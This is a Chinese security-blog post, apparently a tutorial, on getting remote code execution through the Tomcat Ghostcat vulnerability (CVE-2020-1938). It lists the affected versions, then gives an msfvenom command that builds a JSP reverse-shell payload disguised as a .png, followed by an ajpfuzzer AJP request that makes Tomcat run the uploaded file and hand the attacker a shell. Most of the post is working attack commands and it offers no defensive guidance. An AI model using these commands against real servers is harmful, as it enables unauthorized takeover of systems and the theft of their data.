CVE-2020-1938 幽灵猫漏洞RCE

释放双眼,带上耳机,听听看~!
存在此漏洞Tomcat版本:7.*分支7.0.100之前版本8.*分支8.5.51之前版本9.*分支9.0.31之前版本漏洞原理见这里,此处只表RCE方式。msf生成反弹马,监听首先使用msf生成反弹shell马,为方便上传之用直接生成为.png后...

存在此漏洞Tomcat版本:

7.*分支7.0.100之前版本
8.*分支8.5.51之前版本
9.*分支9.0.31之前版本

漏洞原理见这里,此处只表RCE方式。

msf生成反弹马,监听

首先使用msf生成反弹shell马,为方便上传之用直接生成为.png后缀:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.211.55.5 LPORT=999 R >ma.png

在msf监听

木马执行

放入项目目录,此处假设目标机图片上传路径为/t/22

下载AJP包构造器ajpfuzzer

  1. 运行java -jar ajpfuzzer_v0.6.jar

  2. 连接目标端口connect 127.0.0.1 8009

  3. 执行如下命令构造并发送AJP包,其中/t/22/ma.png为木马路径,其中11.jsp可以换为任意该web项目中没有的jsp文件,这样tomcat才会去调用DefaultServlet
    forwardrequest 2 "HTTP/1.1" "/11.jsp" 127.0.0.1 127.0.0.1 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:11.jsp","javax.servlet.include.path_info:/t/22/ma.png","javax.servlet.include.servlet_path:/"
    


    请求发送成功后ma.png被作为jsp解析,成功获取shell

给TA买糖
共{{data.count}}人
人已赞赏
Web安全

Apache Tomcat文件包含漏洞通告(附poc)

2020-2-21 3:56:00

Web安全

Apache CommonCollection Gadget几种特殊的玩法

2020-5-11 8:31:00

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索